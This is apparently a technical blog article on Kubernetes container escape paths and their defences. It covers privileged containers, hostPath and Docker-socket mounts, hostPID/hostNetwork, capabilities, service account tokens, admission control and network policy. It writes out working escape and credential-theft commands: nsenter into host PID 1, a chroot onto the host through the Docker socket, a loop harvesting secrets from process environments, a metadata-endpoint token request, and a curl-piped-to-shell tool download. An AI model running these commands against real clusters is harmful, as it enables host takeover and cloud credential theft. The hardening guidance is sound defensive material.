A container is not a VM. It's a process running in a restricted namespace with a filtered view of the kernel — same kernel, same underlying hardware. The security boundary is a set of Linux primitives: namespaces, cgroups, seccomp profiles, capabilities, and AppArmor or SELinux policy.
When those primitives are misconfigured, the "container boundary" doesn't exist. And in most production Kubernetes clusters I've reviewed, at least one workload is misconfigured in a way that makes escape trivial.
Here's how it actually works.
The easiest escape: privileged containers
securityContext:
privileged: true
This is a complete removal of the container security boundary. A privileged container has all Linux capabilities, can see all host devices, can access the host filesystem, and runs with the same privileges as root on the host node.
Once you're in a privileged container, getting to the host is two commands:
# Find the host PID 1 (init/systemd)
nsenter -t 1 -m -u -i -n -p -- bash
nsenter enters the namespaces of another process — in this case, PID 1 on the host. You're now running in the host's mount, UTS, IPC, network, and PID namespaces. You have a root shell on the Kubernetes node.
From there: read /etc/kubernetes/pki/ for cluster CA keys, read kubelet credentials, access the cloud metadata endpoint for the node's service account credentials, read other containers' filesystem layers, or simply install a backdoor.
I find privileged: true most often on logging agents (Fluentd, Datadog), monitoring tools, and anything that needs to read host filesystem paths. Most of those workloads don't actually need full privilege — they need specific capabilities or specific hostPath mounts. Privileged is what you set when you don't want to figure out the minimum.
hostPath mounts
Even without privileged: true, a hostPath mount of the right directory is often sufficient for escape:
volumes:
- name: docker-sock
hostPath:
path: /var/run/docker.sock
Mounting the Docker socket gives any process in the container the ability to run Docker commands on the host:
docker run --rm -it -v /:/host alpine chroot /host
That creates a new privileged container with the host's root filesystem mounted at /host, then chroots into it. You have root on the host.
/var/run/docker.sock is the obvious one, but similar escapes work with:
/var/run/containerd/containerd.sock— same pattern, containerd socket/proc— access to host processes, their environments, and memory/sys— control groups and kernel parameters/etc— if writable, you can modify host configuration/rootor/home— read SSH keys, bash history, credentials
Legitimate hostPath mounts (reading kernel metrics, writing container logs) should use readOnly: true and be scoped to the minimum path:
volumes:
- name: varlog
hostPath:
path: /var/log/containers
volumeMounts:
- name: varlog
mountPath: /var/log/host
readOnly: true
hostPID and hostNetwork
spec:
hostPID: true
hostNetwork: true
hostPID: true puts the container in the host's PID namespace. You can now see every process on the node and send signals to them. More usefully from an attacker's perspective: you can read /proc/<pid>/environ for any process, which frequently contains environment variables with secrets:
# Read environment of every process on the host
for pid in /proc/[0-9]*/environ; do
cat "$pid" 2>/dev/null | tr '\0' '\n' | grep -i 'secret\|key\|password\|token'
done
hostNetwork: true puts the container in the host's network namespace. The most useful thing this unlocks is access to the cloud metadata endpoint at 169.254.169.254, which issues credentials for the node's service account. On GKE:
curl -H "Metadata-Flavor: Google" \
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
That returns an access token for the GCE service account attached to the node. On most GKE clusters, node service accounts have at minimum logging.logWriter, monitoring.metricWriter, and storage.objectViewer on the project. If someone over-scoped the node SA (common), this token can reach production GCS buckets, Cloud SQL, or worse.
On EKS, the metadata endpoint hands out the EC2 instance profile credentials. On AKS, you get the managed identity token. Same pattern everywhere.
Linux capabilities
Capabilities break root's traditional all-or-nothing model into discrete privileges. Dropping all capabilities and adding back only what's needed is the correct approach. Most workloads don't need any capabilities at all.
The dangerous ones:
CAP_SYS_ADMIN — the kitchen sink. Allows mount operations, namespace creation, device control, BPF programs, ptrace across containers, and a dozen other things. This single capability enables most known container escape techniques.
CAP_NET_ADMIN — can modify network interfaces, routing tables, and firewall rules on the host if combined with hostNetwork.
CAP_SYS_PTRACE — can trace and inject into any process the container can see. With hostPID, this means any process on the node.
CAP_DAC_OVERRIDE — bypasses file permission checks. Can read files owned by other users/processes even without being root.
CAP_CHOWN and CAP_FOWNER — change file ownership, bypass permission checks on owned files.
The correct security context for most application containers:
securityContext:
runAsNonRoot: true
runAsUser: 1000
runAsGroup: 1000
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- ALL
add: [] # only add specific caps if you've verified they're needed
allowPrivilegeEscalation: false prevents processes from gaining more privileges than their parent — specifically, it prevents setuid binaries from working. This is the flag that stops sudo inside a container.
The service account token vector
Every pod gets a mounted service account token by default:
/var/run/secrets/kubernetes.io/serviceaccount/token
An attacker who escapes a container with this token can call the Kubernetes API with the pod's service account permissions. If the service account has broad permissions (see: Kubernetes RBAC misconfigs), this is a cluster takeover path.
For pods that don't need to call the Kubernetes API — most application pods — disable the automount:
spec:
automountServiceAccountToken: false
Or set it at the service account level to apply to all pods using that SA:
apiVersion: v1
kind: ServiceAccount
metadata:
name: my-app
automountServiceAccountToken: false
For pods that do need API access, use a dedicated service account with minimal permissions rather than the default SA, which often accumulates bindings over time.
What attackers actually use
Two tools come up in every container escape conversation:
deepce — a shell script that enumerates container escape opportunities. Checks for privileged mode, dangerous capabilities, hostPath mounts, docker socket, writable filesystem, and more. Takes seconds to run.
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
CDK (Container Duck Knife) — a Go binary with escape exploits, not just detection. Has specific exploit modules for docker socket, privileged mode, capability-based escapes, and more.
amicontained — shows you your current capabilities and namespace configuration from inside a container.
If you're doing a security review and have exec access to a pod, these three tools will tell you within seconds whether escape is possible and how.
How to stop it: admission control
Pod security contexts are only enforced if something validates them at admission time. You can write the correct securityContext fields in your manifests, but unless an admission controller rejects pods that don't comply, a misconfigured deploy will still run.
Pod Security Standards (PSS) — Kubernetes 1.25+ built-in. Three profiles: privileged (no restrictions), baseline (blocks the worst — privileged containers, most hostPath types, hostPID/hostNetwork), and restricted (requires non-root, drops all capabilities, read-only root filesystem). Apply at the namespace level:
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/audit: restricted
OPA/Gatekeeper or Kyverno — policy-as-code admission controllers. More expressive than PSS for custom rules. Example Kyverno policy requiring allowPrivilegeEscalation: false:
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: disallow-privilege-escalation
spec:
validationFailureAction: Enforce
rules:
- name: check-privilege-escalation
match:
any:
- resources:
kinds: [Pod]
validate:
message: "Privilege escalation is not allowed."
pattern:
spec:
containers:
- (name): "?*"
securityContext:
allowPrivilegeEscalation: false
Without admission control, security contexts are advisory. With it, they're enforced at the API server — a misconfigured manifest is rejected before it can run.
Blocking the metadata endpoint
Even if a container can't escape to the host, hostNetwork: true or a misconfigured network policy can let it reach the cloud metadata endpoint and steal node credentials.
On GKE, block metadata endpoint access for pods that don't need it with a NetworkPolicy:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: block-metadata-endpoint
namespace: production
spec:
podSelector: {}
policyTypes:
- Egress
egress:
- to:
- ipBlock:
cidr: 0.0.0.0/0
except:
- 169.254.169.254/32 # block GCP metadata endpoint
- 169.254.169.253/32 # block GKE metadata server
GKE Autopilot blocks metadata endpoint access by default through the metadata concealment feature. On Standard GKE, enable Workload Identity — it replaces the instance metadata credentials with per-pod credentials, and the node SA's access to GCP is removed entirely.
The security context baseline for production
spec:
hostPID: false
hostIPC: false
hostNetwork: false
automountServiceAccountToken: false
securityContext:
runAsNonRoot: true
seccompProfile:
type: RuntimeDefault
containers:
- name: app
securityContext:
runAsUser: 1000
runAsGroup: 1000
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- ALL
seccompProfile: RuntimeDefault enables the container runtime's default seccomp profile, which blocks a significant set of dangerous syscalls (including several used by known escape techniques) without requiring you to write a custom profile.
This isn't a complete defense — admission control, network policies, and RBAC are all also required — but it's the baseline every production workload should meet.